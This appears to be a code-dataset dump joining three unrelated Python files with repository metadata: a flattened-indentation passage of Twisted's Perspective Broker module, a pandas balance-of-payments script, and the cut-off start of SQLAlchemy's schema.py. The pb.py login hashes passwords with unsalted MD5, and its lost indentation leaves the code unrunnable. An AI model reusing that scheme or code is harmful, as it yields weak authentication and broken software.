# Dictionary mapping LUIDs to local (remotely cached) objects. Remotely
# cached means that they're objects which originate here, and were
# copied remotely.
self.remotelyCachedObjects = {}
# Dictionary mapping PUIDs to (cached) LUIDs
self.remotelyCachedLUIDs = {}
# Dictionary mapping (remote) LUIDs to (locally cached) objects.
self.locallyCachedObjects = {}
self.waitingForAnswers = {}
# Mapping from LUIDs to weakref objects with callbacks for performing
# any local cleanup which may be necessary for the corresponding
# object once it no longer exists.
self._localCleanup = {}
def resumeProducing(self):
"""Called when the consumer attached to me runs out of buffer.
"""
# Go backwards over the list so we can remove indexes from it as we go
for pageridx in xrange(len(self.pageProducers)-1, -1, -1):
pager = self.pageProducers[pageridx]
pager.sendNextPage()
if not pager.stillPaging():
del self.pageProducers[pageridx]
if not self.pageProducers:
self.transport.unregisterProducer()
# Streaming producer methods; not necessary to implement.
def pauseProducing(self):
pass
def stopProducing(self):
pass
def registerPageProducer(self, pager):
self.pageProducers.append(pager)
if len(self.pageProducers) == 1:
self.transport.registerProducer(self, 0)
def expressionReceived(self, sexp):
"""Evaluate an expression as it's received.
"""
if isinstance(sexp, types.ListType):
command = sexp[0]
methodName = "proto_%s" % command
method = getattr(self, methodName, None)
if method:
method(*sexp[1:])
else:
self.sendCall("didNotUnderstand", command)
else:
raise ProtocolError("Non-list expression received.")
def proto_version(self, vnum):
"""Protocol message: (version version-number)
Check to make sure that both ends of the protocol are speaking
the same version dialect.
"""
if vnum != self.version:
raise ProtocolError("Version Incompatibility: %s %s" % (self.version, vnum))
def sendCall(self, *exp):
"""Utility method to send an expression to the other side of the connection.
"""
self.sendEncoded(exp)
def proto_didNotUnderstand(self, command):
"""Respond to stock 'C{didNotUnderstand}' message.
Log the command that was not understood and continue. (Note:
this will probably be changed to close the connection or raise
an exception in the future.)
"""
log.msg("Didn't understand command: %r" % command)
def connectionReady(self):
"""Initialize. Called after Banana negotiation is done.
"""
self.sendCall("version", self.version)
for notifier in self.connects:
try:
notifier()
except:
log.deferr()
self.connects = None
if self.factory: # in tests we won't have factory
self.factory.clientConnectionMade(self)
def connectionFailed(self):
# XXX should never get called anymore? check!
for notifier in self.failures:
try:
notifier()
except:
log.deferr()
self.failures = None
waitingForAnswers = None
def connectionLost(self, reason):
"""The connection was lost.
"""
self.disconnected = 1
# nuke potential circular references.
self.luids = None
if self.waitingForAnswers:
for d in self.waitingForAnswers.values():
try:
d.errback(failure.Failure(PBConnectionLost(reason)))
except:
log.deferr()
# Assure all Cacheable.stoppedObserving are called
for lobj in self.remotelyCachedObjects.values():
cacheable = lobj.object
perspective = lobj.perspective
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
# Loop over a copy so that notifiers which call dontNotifyOnDisconnect
# cannot mutate the list while we iterate over it.
for notifier in self.disconnects[:]:
try:
notifier()
except:
log.deferr()
self.disconnects = None
self.waitingForAnswers = None
self.localSecurity = None
self.remoteSecurity = None
self.remotelyCachedObjects = None
self.remotelyCachedLUIDs = None
self.locallyCachedObjects = None
self.localObjects = None
def notifyOnDisconnect(self, notifier):
"""Call the given callback when the Broker disconnects."""
assert callable(notifier)
self.disconnects.append(notifier)
def notifyOnFail(self, notifier):
"""Call the given callback if the Broker fails to connect."""
assert callable(notifier)
self.failures.append(notifier)
def notifyOnConnect(self, notifier):
"""Call the given callback when the Broker connects."""
assert callable(notifier)
if self.connects is None:
try:
notifier()
except:
log.err()
else:
self.connects.append(notifier)
def dontNotifyOnDisconnect(self, notifier):
"""Remove a callback from list of disconnect callbacks."""
try:
self.disconnects.remove(notifier)
except ValueError:
pass
def localObjectForID(self, luid):
"""
Get a local object for a locally unique ID.
@return: An object previously stored with L{registerReference} or
C{None} if there is no object which corresponds to the given
identifier.
"""
lob = self.localObjects.get(luid)
if lob is None:
return
return lob.object
maxBrokerRefsViolations = 0
def registerReference(self, object):
"""Get an ID for a local object.
Store a persistent reference to a local object and map its id()
to a generated, session-unique ID and return that ID.
"""
assert object is not None
puid = object.processUniqueID()
luid = self.luids.get(puid)
if luid is None:
if len(self.localObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB reference count exceeded. "
"Goodbye.")
raise Error("Maximum PB reference count exceeded.")
luid = self.newLocalID()
self.localObjects[luid] = Local(object)
self.luids[puid] = luid
else:
self.localObjects[luid].incref()
return luid
def setNameForLocal(self, name, object):
"""Store a special (string) ID for this object.
This is how you specify a 'base' set of objects that the remote
protocol can connect to.
"""
assert object is not None
self.localObjects[name] = Local(object)
def remoteForName(self, name):
"""Returns an object from the remote name mapping.
Note that this does not check the validity of the name, only
creates a translucent reference for it.
"""
return RemoteReference(None, self, name, 0)
def cachedRemotelyAs(self, instance, incref=0):
"""Returns an ID that says what this instance is cached as remotely, or C{None} if it's not.
"""
puid = instance.processUniqueID()
luid = self.remotelyCachedLUIDs.get(puid)
if (luid is not None) and (incref):
self.remotelyCachedObjects[luid].incref()
return luid
def remotelyCachedForLUID(self, luid):
"""Returns an instance which is cached remotely, with this LUID.
"""
return self.remotelyCachedObjects[luid].object
def cacheRemotely(self, instance):
"""
XXX"""
puid = instance.processUniqueID()
luid = self.newLocalID()
if len(self.remotelyCachedObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB cache count exceeded. "
"Goodbye.")
raise Error("Maximum PB cache count exceeded.")
self.remotelyCachedLUIDs[puid] = luid
# This table may not be necessary -- for now, it's to make sure that no
# monkey business happens with id(instance)
self.remotelyCachedObjects[luid] = Local(instance, self.serializingPerspective)
return luid
def cacheLocally(self, cid, instance):
"""(internal)
Store a non-filled-out cached instance locally.
"""
self.locallyCachedObjects[cid] = instance
def cachedLocallyAs(self, cid):
instance = self.locallyCachedObjects[cid]
return instance
def serialize(self, object, perspective=None, method=None, args=None, kw=None):
"""Jelly an object according to the remote security rules for this broker.
"""
if isinstance(object, defer.Deferred):
object.addCallbacks(self.serialize, lambda x: x,
callbackKeywords={
'perspective': perspective,
'method': method,
'args': args,
'kw': kw
})
return object
# XXX This call is NOT REENTRANT and testing for reentrancy is just
# crazy, so it likely won't be. Don't ever write methods that call the
# broker's serialize() method recursively (e.g. sending a method call
# from within a getState (this causes concurrency problems anyway so
# you really, really shouldn't do it))
# self.jellier = _NetJellier(self)
self.serializingPerspective = perspective
self.jellyMethod = method
self.jellyArgs = args
self.jellyKw = kw
try:
return jelly(object, self.security, None, self)
finally:
self.serializingPerspective = None
self.jellyMethod = None
self.jellyArgs = None
self.jellyKw = None
def unserialize(self, sexp, perspective = None):
"""Unjelly an sexp according to the local security rules for this broker.
"""
self.unserializingPerspective = perspective
try:
return unjelly(sexp, self.security, None, self)
finally:
self.unserializingPerspective = None
def newLocalID(self):
"""Generate a new LUID.
"""
self.currentLocalID = self.currentLocalID + 1
return self.currentLocalID
def newRequestID(self):
"""Generate a new request ID.
"""
self.currentRequestID = self.currentRequestID + 1
return self.currentRequestID
def _sendMessage(self, prefix, perspective, objectID, message, args, kw):
pbc = None
pbe = None
answerRequired = 1
if kw.has_key('pbcallback'):
pbc = kw['pbcallback']
del kw['pbcallback']
if kw.has_key('pberrback'):
pbe = kw['pberrback']
del kw['pberrback']
if kw.has_key('pbanswer'):
assert (not pbe) and (not pbc), "You can't specify a no-answer requirement."
answerRequired = kw['pbanswer']
del kw['pbanswer']
if self.disconnected:
raise DeadReferenceError("Calling Stale Broker")
try:
netArgs = self.serialize(args, perspective=perspective, method=message)
netKw = self.serialize(kw, perspective=perspective, method=message)
except:
return defer.fail(failure.Failure())
requestID = self.newRequestID()
if answerRequired:
rval = defer.Deferred()
self.waitingForAnswers[requestID] = rval
if pbc or pbe:
log.msg('warning! using deprecated "pbcallback"')
rval.addCallbacks(pbc, pbe)
else:
rval = None
self.sendCall(prefix+"message", requestID, objectID, message, answerRequired, netArgs, netKw)
return rval
def proto_message(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.localObjectForID, requestID, objectID, message, answerRequired, netArgs, netKw)
def proto_cachemessage(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.cachedLocallyAs, requestID, objectID, message, answerRequired, netArgs, netKw)
def _recvMessage(self, findObjMethod, requestID, objectID, message, answerRequired, netArgs, netKw):
"""Received a message-send.
Look up message based on object, unserialize the arguments, and
invoke it with args, and send an 'answer' or 'error' response.
"""
try:
object = findObjMethod(objectID)
if object is None:
raise Error("Invalid Object ID")
netResult = object.remoteMessageReceived(self, message, netArgs, netKw)
except Error, e:
if answerRequired:
# If the error is Jellyable or explicitly allowed via our
# security options, send it back and let the code on the
# other end deal with unjellying. If it isn't Jellyable,
# wrap it in a CopyableFailure, which ensures it can be
# unjellied on the other end. We have to do this because
# all errors must be sent back.
if isinstance(e, Jellyable) or self.security.isClassAllowed(e.__class__):
self._sendError(e, requestID)
else:
self._sendError(CopyableFailure(e), requestID)
except:
if answerRequired:
log.msg("Peer will receive following PB traceback:", isError=True)
f = CopyableFailure()
self._sendError(f, requestID)
log.err()
else:
if answerRequired:
if isinstance(netResult, defer.Deferred):
args = (requestID,)
netResult.addCallbacks(self._sendAnswer, self._sendFailureOrError,
callbackArgs=args, errbackArgs=args)
# XXX Should this be done somewhere else?
else:
self._sendAnswer(netResult, requestID)
##
# success
##
def _sendAnswer(self, netResult, requestID):
"""(internal) Send an answer to a previously sent message.
"""
self.sendCall("answer", requestID, netResult)
def proto_answer(self, requestID, netResult):
"""(internal) Got an answer to a previously sent message.
Look up the appropriate callback and call it.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.callback(self.unserialize(netResult))
##
# failure
##
def _sendFailureOrError(self, fail, requestID):
"""
Call L{_sendError} or L{_sendFailure}, depending on whether C{fail}
represents an L{Error} subclass or not.
"""
if fail.check(Error) is None:
self._sendFailure(fail, requestID)
else:
self._sendError(fail, requestID)
def _sendFailure(self, fail, requestID):
"""Log error and then send it."""
log.msg("Peer will receive following PB traceback:")
log.err(fail)
self._sendError(fail, requestID)
def _sendError(self, fail, requestID):
"""(internal) Send an error for a previously sent message.
"""
if isinstance(fail, failure.Failure):
# If the failures value is jellyable or allowed through security,
# send the value
if (isinstance(fail.value, Jellyable) or
self.security.isClassAllowed(fail.value.__class__)):
fail = fail.value
elif not isinstance(fail, CopyableFailure):
fail = failure2Copyable(fail, self.factory.unsafeTracebacks)
if isinstance(fail, CopyableFailure):
fail.unsafeTracebacks = self.factory.unsafeTracebacks
self.sendCall("error", requestID, self.serialize(fail))
def proto_error(self, requestID, fail):
"""(internal) Deal with an error.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.errback(self.unserialize(fail))
##
# refcounts
##
def sendDecRef(self, objectID):
"""(internal) Send a DECREF directive.
"""
self.sendCall("decref", objectID)
def proto_decref(self, objectID):
"""(internal) Decrement the reference count of an object.
If the reference count is zero, it will free the reference to this
object.
"""
refs = self.localObjects[objectID].decref()
if refs == 0:
puid = self.localObjects[objectID].object.processUniqueID()
del self.luids[puid]
del self.localObjects[objectID]
self._localCleanup.pop(puid, lambda: None)()
##
# caching
##
def decCacheRef(self, objectID):
"""(internal) Send a DECACHE directive.
"""
self.sendCall("decache", objectID)
def proto_decache(self, objectID):
"""(internal) Decrement the reference count of a cached object.
If the reference count is zero, free the reference, then send an
'uncached' directive.
"""
refs = self.remotelyCachedObjects[objectID].decref()
# log.msg('decaching: %s #refs: %s' % (objectID, refs))
if refs == 0:
lobj = self.remotelyCachedObjects[objectID]
cacheable = lobj.object
perspective = lobj.perspective
# TODO: force_decache needs to be able to force-invalidate a
# cacheable reference.
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
puid = cacheable.processUniqueID()
del self.remotelyCachedLUIDs[puid]
del self.remotelyCachedObjects[objectID]
self.sendCall("uncache", objectID)
def proto_uncache(self, objectID):
"""(internal) Tell the client it is now OK to uncache an object.
"""
# log.msg("uncaching locally %d" % objectID)
obj = self.locallyCachedObjects[objectID]
obj.broker = None
## def reallyDel(obj=obj):
## obj.__really_del__()
## obj.__del__ = reallyDel
del self.locallyCachedObjects[objectID]
def respond(challenge, password):
"""Respond to a challenge.
This is useful for challenge/response authentication.
"""
m = md5()
m.update(password)
hashedPassword = m.digest()
m = md5()
m.update(hashedPassword)
m.update(challenge)
doubleHashedPassword = m.digest()
return doubleHashedPassword
def challenge():
"""I return some random data."""
crap = ''
for x in range(random.randrange(15,25)):
crap = crap + chr(random.randint(65,90))
crap = md5(crap).digest()
return crap
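# A round-trip sketch of the challenge/response scheme implemented by
# challenge() and respond() above and verified by _PortalAuthChallenger
# further below; the password is a made-up example value.
def _example_challenge_response():
    password = "correct horse"
    c = challenge()
    response = respond(c, password)
    # recompute what the server-side check performs
    verifier = md5()
    verifier.update(md5(password).digest())
    verifier.update(c)
    assert response == verifier.digest()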
class PBClientFactory(protocol.ClientFactory):
"""
Client factory for PB brokers.
As with all client factories, use with reactor.connectTCP/SSL/etc..
getPerspective and getRootObject can be called either before or
after the connect.
"""
protocol = Broker
unsafeTracebacks = False
def __init__(self, unsafeTracebacks=False, security=globalSecurity):
"""
@param unsafeTracebacks: if set, tracebacks for exceptions will be sent
over the wire.
@type unsafeTracebacks: C{bool}
@param security: security options used by the broker, default to
C{globalSecurity}.
@type security: L{twisted.spread.jelly.SecurityOptions}
"""
self.unsafeTracebacks = unsafeTracebacks
self.security = security
self._reset()
def buildProtocol(self, addr):
"""
Build the broker instance, passing the security options to it.
"""
p = self.protocol(isClient=True, security=self.security)
p.factory = self
return p
def _reset(self):
self.rootObjectRequests = [] # list of deferred
self._broker = None
self._root = None
def _failAll(self, reason):
deferreds = self.rootObjectRequests
self._reset()
for d in deferreds:
d.errback(reason)
def clientConnectionFailed(self, connector, reason):
self._failAll(reason)
def clientConnectionLost(self, connector, reason, reconnecting=0):
"""Reconnecting subclasses should call with reconnecting=1."""
if reconnecting:
# any pending requests will go to next connection attempt
# so we don't fail them.
self._broker = None
self._root = None
else:
self._failAll(reason)
def clientConnectionMade(self, broker):
self._broker = broker
self._root = broker.remoteForName("root")
ds = self.rootObjectRequests
self.rootObjectRequests = []
for d in ds:
d.callback(self._root)
def getRootObject(self):
"""Get root object of remote PB server.
@return: Deferred of the root object.
"""
if self._broker and not self._broker.disconnected:
return defer.succeed(self._root)
d = defer.Deferred()
self.rootObjectRequests.append(d)
return d
def disconnect(self):
"""If the factory is connected, close the connection.
Note that if you set up the factory to reconnect, you will need to
implement extra logic to prevent automatic reconnection after this
is called.
"""
if self._broker:
self._broker.transport.loseConnection()
def _cbSendUsername(self, root, username, password, client):
return root.callRemote("login", username).addCallback(
self._cbResponse, password, client)
def _cbResponse(self, (challenge, challenger), password, client):
return challenger.callRemote("respond", respond(challenge, password), client)
def _cbLoginAnonymous(self, root, client):
"""
Attempt an anonymous login on the given remote root object.
@type root: L{RemoteReference}
@param root: The object on which to attempt the login, most likely
returned by a call to L{PBClientFactory.getRootObject}.
@param client: A jellyable object which will be used as the I{mind}
parameter for the login attempt.
@rtype: L{Deferred}
@return: A L{Deferred} which will be called back with a
L{RemoteReference} to an avatar when anonymous login succeeds, or
which will errback if anonymous login fails.
"""
return root.callRemote("loginAnonymous", client)
def login(self, credentials, client=None):
"""
Login and get perspective from remote PB server.
Currently the following credentials are supported::
L{twisted.cred.credentials.IUsernamePassword}
L{twisted.cred.credentials.IAnonymous}
@rtype: L{Deferred}
@return: A L{Deferred} which will be called back with a
L{RemoteReference} for the avatar logged in to, or which will
errback if login fails.
"""
d = self.getRootObject()
if IAnonymous.providedBy(credentials):
d.addCallback(self._cbLoginAnonymous, client)
else:
d.addCallback(
self._cbSendUsername, credentials.username,
credentials.password, client)
return d
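# A login sketch for the credential types listed in login() above; the host,
# username and password are made-up example values, and the final callRemote
# assumes the avatar defines a perspective_echo method.
def _example_pb_login():
    from twisted.cred.credentials import UsernamePassword
    from twisted.internet import reactor

    factory = PBClientFactory()
    reactor.connectTCP("localhost", portno, factory)
    d = factory.login(UsernamePassword("alice", "secret"))
    d.addCallback(lambda perspective: perspective.callRemote("echo", "hi"))
    return d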
class PBServerFactory(protocol.ServerFactory):
"""
Server factory for perspective broker.
Login is done using a Portal object, whose realm is expected to return
avatars implementing IPerspective. The credential checkers in the portal
should accept IUsernameHashedPassword or IUsernameMD5Password.
Alternatively, any object providing or adaptable to L{IPBRoot} can be
used instead of a portal to provide the root object of the PB server.
"""
unsafeTracebacks = False
# object broker factory
protocol = Broker
def __init__(self, root, unsafeTracebacks=False, security=globalSecurity):
"""
@param root: factory providing the root Referenceable used by the broker.
@type root: object providing or adaptable to L{IPBRoot}.
@param unsafeTracebacks: if set, tracebacks for exceptions will be sent
over the wire.
@type unsafeTracebacks: C{bool}
@param security: security options used by the broker, default to
C{globalSecurity}.
@type security: L{twisted.spread.jelly.SecurityOptions}
"""
self.root = IPBRoot(root)
self.unsafeTracebacks = unsafeTracebacks
self.security = security
def buildProtocol(self, addr):
"""
Return a Broker attached to the factory (as the service provider).
"""
proto = self.protocol(isClient=False, security=self.security)
proto.factory = self
proto.setNameForLocal("root", self.root.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
# XXX does this method make any sense?
pass
class IUsernameMD5Password(ICredentials):
"""
I encapsulate a username and a hashed password.
This credential is used for username/password over PB. CredentialCheckers
which check this kind of credential must store the passwords in plaintext
form or as an MD5 digest.
@type username: C{str} or C{Deferred}
@ivar username: The username associated with these credentials.
"""
def checkPassword(password):
"""
Validate these credentials against the correct password.
@type password: C{str}
@param password: The correct, plaintext password against which to
check.
@rtype: C{bool} or L{Deferred}
@return: C{True} if the credentials represented by this object match the
given password, C{False} if they do not, or a L{Deferred} which will
be called back with one of these values.
"""
def checkMD5Password(password):
"""
Validate these credentials against the correct MD5 digest of the
password.
@type password: C{str}
@param password: The correct MD5 digest of a password against which to
check.
@rtype: C{bool} or L{Deferred}
@return: C{True} if the credentials represented by this object match the
given digest, C{False} if they do not, or a L{Deferred} which will
be called back with one of these values.
"""
class _PortalRoot:
"""Root object, used to login to portal."""
implements(IPBRoot)
def __init__(self, portal):
self.portal = portal
def rootObject(self, broker):
return _PortalWrapper(self.portal, broker)
registerAdapter(_PortalRoot, Portal, IPBRoot)
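# A sketch of serving avatars through a Portal, which the adapter registered
# above lets you pass directly as the root of a PBServerFactory; the realm,
# checker contents and bare Avatar placeholder are hypothetical examples.
def _example_portal_server():
    from twisted.cred.portal import IRealm
    from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
    from twisted.internet import reactor

    class ExampleRealm:
        implements(IRealm)

        def requestAvatar(self, avatarId, mind, *interfaces):
            assert IPerspective in interfaces
            # a real realm would return an Avatar subclass with perspective_
            # methods; a plain Avatar is used here only as a placeholder
            return IPerspective, Avatar(), lambda: None

    checker = InMemoryUsernamePasswordDatabaseDontUse(alice="secret")
    portal = Portal(ExampleRealm(), [checker])
    reactor.listenTCP(portno, PBServerFactory(portal))
    reactor.run()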
class _JellyableAvatarMixin:
"""
Helper class for code which deals with avatars which PB must be capable of
sending to a peer.
"""
def _cbLogin(self, (interface, avatar, logout)):
"""
Ensure that the avatar to be returned to the client is jellyable and
set up disconnection notification to call the realm's logout object.
"""
if not IJellyable.providedBy(avatar):
avatar = AsReferenceable(avatar, "perspective")
puid = avatar.processUniqueID()
# only call logout once, whether the connection is dropped (disconnect)
# or a logout occurs (cleanup), and be careful to drop the reference to
# it in either case
logout = [ logout ]
def maybeLogout():
if not logout:
return
fn = logout[0]
del logout[0]
fn()
self.broker._localCleanup[puid] = maybeLogout
self.broker.notifyOnDisconnect(maybeLogout)
return avatar
class _PortalWrapper(Referenceable, _JellyableAvatarMixin):
"""
Root Referenceable object, used to login to portal.
"""
def __init__(self, portal, broker):
self.portal = portal
self.broker = broker
def remote_login(self, username):
"""
Start of username/password login.
"""
c = challenge()
return c, _PortalAuthChallenger(self.portal, self.broker, username, c)
def remote_loginAnonymous(self, mind):
"""
Attempt an anonymous login.
@param mind: An object to use as the mind parameter to the portal login
call (possibly None).
@rtype: L{Deferred}
@return: A Deferred which will be called back with an avatar when login
succeeds or which will be errbacked if login fails somehow.
"""
d = self.portal.login(Anonymous(), mind, IPerspective)
d.addCallback(self._cbLogin)
return d
class _PortalAuthChallenger(Referenceable, _JellyableAvatarMixin):
"""
Called with response to password challenge.
"""
implements(IUsernameHashedPassword, IUsernameMD5Password)
def __init__(self, portal, broker, username, challenge):
self.portal = portal
self.broker = broker
self.username = username
self.challenge = challenge
def remote_respond(self, response, mind):
self.response = response
d = self.portal.login(self, mind, IPerspective)
d.addCallback(self._cbLogin)
return d
# IUsernameHashedPassword:
def checkPassword(self, password):
return self.checkMD5Password(md5(password).digest())
# IUsernameMD5Password
def checkMD5Password(self, md5Password):
md = md5()
md.update(md5Password)
md.update(self.challenge)
correct = md.digest()
return self.response == correct
__all__ = [
# Everything from flavors is exposed publically here.
'IPBRoot', 'Serializable', 'Referenceable', 'NoSuchMethod', 'Root',
'ViewPoint', 'Viewable', 'Copyable', 'Jellyable', 'Cacheable',
'RemoteCopy', 'RemoteCache', 'RemoteCacheObserver', 'copyTags',
'setUnjellyableForClass', 'setUnjellyableFactoryForClass',
'setUnjellyableForClassTree',
'setCopierForClass', 'setFactoryForClass', 'setCopierForClassTree',
'MAX_BROKER_REFS', 'portno',
'ProtocolError', 'DeadReferenceError', 'Error', 'PBConnectionLost',
'RemoteMethod', 'IPerspective', 'Avatar', 'AsReferenceable',
'RemoteReference', 'CopyableFailure', 'CopiedFailure', 'failure2Copyable',
'Broker', 'respond', 'challenge', 'PBClientFactory', 'PBServerFactory',
'IUsernameMD5Password',
]
|
Varriount/Colliberation
|
libs/twisted/spread/pb.py
|
Python
|
mit
| 48,450
|
__author__ = 'brendan'
import main
import pandas as pd
import numpy as np
from datetime import datetime as dt
from matplotlib import pyplot as plt
import random
import itertools
import time
import dateutil
from datetime import timedelta
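# The steps below build quarterly current-account and financial-account series
# as a share of GDP for the UK and the euro area from the CSVs in raw_data/,
# plot the two current-account series together, and plot a 4-quarter rolling
# average of the UK financial-account components.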
cols = ['BoP FA Net', 'BoP FA OI Net', 'BoP FA PI Net', 'CA % GDP']
raw_data = pd.read_csv('raw_data/BoP_UK.csv', index_col=0, parse_dates=True)
data = pd.DataFrame(raw_data.iloc[:240, :4].fillna(0)).astype(float)
data.columns = cols
data.index = pd.date_range('1955-01-01', '2014-12-31', freq='Q')
raw_eur = pd.read_csv('raw_data/EUR_CA.csv', index_col=0, parse_dates=True)
raw_eur = raw_eur[::-1]
raw_eur.index = pd.date_range('1999-01-01', '2015-03-01', freq='M')
raw_eur.index.name = 'Date'
raw_eur = raw_eur.resample('Q', how='sum')
data_eur_gdp_q = pd.read_csv('raw_data/MACRO_DATA.csv', index_col=0, parse_dates=True)['EUR_GDP_Q'].dropna()
data_eur_gdp_q.columns = ['EUR_GDP_Q']
data_eur_gdp_q.index.name = 'Date'
data_eur_gdp_q = data_eur_gdp_q.loc['1999-03-31':]
end_gdp = pd.DataFrame(data=[data_eur_gdp_q.iloc[-1], data_eur_gdp_q.iloc[-1],
data_eur_gdp_q.iloc[-1], data_eur_gdp_q.iloc[-1]],
index=pd.date_range('2014-06-30', '2015-03-31', freq='Q'))
eur_gdp = pd.concat([data_eur_gdp_q, end_gdp])
eur_gdp.columns = ['EUR_CA']
eur_ca = raw_eur.div(eur_gdp)
eur_ca.columns = ['EUR CA']
uk_ca = data['CA % GDP'] / 100.0
uk_ca.columns = ['UK CA']
uk_fa = pd.DataFrame(data.iloc[:, :3])
uk_gdp = pd.read_csv('raw_data/MACRO_DATA.csv', index_col=0, parse_dates=True)['UK_GDP_Q'].dropna()
uk_gdp_final = pd.concat([uk_gdp, pd.DataFrame(data=[uk_gdp.iloc[-1], uk_gdp.iloc[-1]],
index=pd.date_range('2014-09-01', '2014-12-31', freq='Q'))])
uk_fa_gdp = pd.DataFrame(index=uk_gdp_final.index)
uk_fa_gdp['UK FA Net'] = uk_fa['BoP FA Net'] / uk_gdp_final
uk_fa_gdp['UK FA OI'] = uk_fa['BoP FA OI Net'] / uk_gdp_final
uk_fa_gdp['UK FA PI'] = uk_fa['BoP FA PI Net'] / uk_gdp_final
print(eur_gdp)
eur_fa = pd.read_csv('raw_data/EUR_FA.csv', index_col=0, header=0, parse_dates=True).dropna().astype(float)
eur_fa = eur_fa.iloc[::-1]
print(eur_fa)
eur_fa.index = pd.date_range('2009-01-01', '2015-02-28', freq='M')
eur_fa = eur_fa.resample('Q', how='sum')
print(eur_fa)
eur_fa_gdp = pd.DataFrame(index=eur_gdp.index)
eur_fa_gdp['EUR FA Net'] = eur_fa['EUR FA Net'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
eur_fa_gdp['EUR FA OI'] = eur_fa['EUR FA OI'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
eur_fa_gdp['EUR FA PI'] = eur_fa['EUR FA PI'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
print(eur_fa_gdp)
fig, ax = plt.subplots()
uk_ca.plot(ax=ax, label='UK CA')
eur_ca.plot(ax=ax, label='EUR CA')
ax.set_title('Current Account %GDP')
plt.legend()
uk_fa_gdp_4q = pd.rolling_mean(uk_fa_gdp, window=4)
fig2, ax2 = plt.subplots()
uk_fa_gdp_4q.plot(ax=ax2)
#eur_fa_gdp.plot(ax=ax2)
plt.legend()
ax2.set_title('UK Financial Account % GDP (4Q Avg.)')
#plt.show()
dates = pd.DataFrame(index=pd.date_range('1960-03-31', '2015-01-01', freq='Q'))
print(dates)
dates.to_csv('raw_data/US_BoP.csv')
|
boneil3/backtest
|
BoP.py
|
Python
|
mit
| 3,114
|
# sqlalchemy/schema.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The schema module provides the building blocks for database metadata.
Each element within this module describes a database entity which can be
created and dropped, or is otherwise part of such an entity. Examples include
tables, columns, sequences, and indexes.
All entities are subclasses of :class:`~sqlalchemy.schema.SchemaItem`, and as
defined in this module they are intended to be agnostic of any vendor-specific
constructs.
A collection of entities are grouped into a unit called
:class:`~sqlalchemy.schema.MetaData`. MetaData serves as a logical grouping of
schema elements, and can also be associated with an actual database connection
such that operations involving the contained elements can contact the database
as needed.
Two of the elements here also build upon their "syntactic" counterparts, which
are defined in :mod:`~sqlalchemy.sql.expression`, specifically
:class:`~sqlalchemy.schema.Table` and :class:`~sqlalchemy.schema.Column`.
Since these objects are part of the SQL expression language, they are usable
as components in SQL expressions.
"""
import re, inspect
from sqlalchemy import exc, util, dialects
from sqlalchemy.sql import expression, visitors
from sqlalchemy import event, events
ddl = util.importlater("sqlalchemy.engine", "ddl")
sqlutil = util.importlater("sqlalchemy.sql", "util")
url = util.importlater("sqlalchemy.engine", "url")
sqltypes = util.importlater("sqlalchemy", "types")
__all__ = ['SchemaItem', 'Table', 'Column', 'ForeignKey', 'Sequence', 'Index',
'ForeignKeyConstraint', 'PrimaryKeyConstraint', 'CheckConstraint',
'UniqueConstraint', 'DefaultGenerator', 'Constraint', 'MetaData',
'ThreadLocalMetaData', 'SchemaVisitor', 'PassiveDefault',
'DefaultClause', 'FetchedValue', 'ColumnDefault', 'DDL',
'CreateTable', 'DropTable', 'CreateSequence', 'DropSequence',
'AddConstraint', 'DropConstraint',
]
__all__.sort()
RETAIN_SCHEMA = util.symbol('retain_schema')
class SchemaItem(events.SchemaEventTarget, visitors.Visitable):
"""Base class for items that define a database schema."""
__visit_name__ = 'schema_item'
quote = None
def _init_items(self, *args):
"""Initialize the list of child items for this SchemaItem."""
for item in args:
if item is not None:
item._set_parent_with_dispatch(self)
def get_children(self, **kwargs):
"""used to allow SchemaVisitor access"""
return []
def __repr__(self):
return "%s()" % self.__class__.__name__
@util.memoized_property
def info(self):
return {}
def _get_table_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
class Table(SchemaItem, expression.TableClause):
"""Represent a table in a database.
e.g.::
mytable = Table("mytable", metadata,
Column('mytable_id', Integer, primary_key=True),
Column('value', String(50))
)
The :class:`.Table` object constructs a unique instance of itself based on its
name and optional schema name within the given :class:`.MetaData` object.
Calling the :class:`.Table`
constructor with the same name and same :class:`.MetaData` argument
a second time will return the *same* :class:`.Table` object - in this way
the :class:`.Table` constructor acts as a registry function.
Constructor arguments are as follows:
:param name: The name of this table as represented in the database.
This property, along with the *schema*, indicates the *singleton
identity* of this table in relation to its parent :class:`.MetaData`.
Additional calls to :class:`.Table` with the same name, metadata,
and schema name will return the same :class:`.Table` object.
Names which contain no upper case characters
will be treated as case insensitive names, and will not be quoted
unless they are a reserved word. Names with any number of upper
case characters will be quoted and sent exactly. Note that this
behavior applies even for databases which standardize upper
case names as case insensitive such as Oracle.
:param metadata: a :class:`.MetaData` object which will contain this
table. The metadata is used as a point of association of this table
with other tables which are referenced via foreign key. It also
may be used to associate this table with a particular
:class:`~sqlalchemy.engine.base.Connectable`.
:param \*args: Additional positional arguments are used primarily
to add the list of :class:`.Column` objects contained within this
table. Similar to the style of a CREATE TABLE statement, other
:class:`.SchemaItem` constructs may be added here, including
:class:`.PrimaryKeyConstraint`, and :class:`.ForeignKeyConstraint`.
:param autoload: Defaults to False: the Columns for this table should
be reflected from the database. Usually there will be no Column
objects in the constructor if this property is set.
:param autoload_with: If autoload==True, this is an optional Engine
or Connection instance to be used for the table reflection. If
``None``, the underlying MetaData's bound connectable will be used.
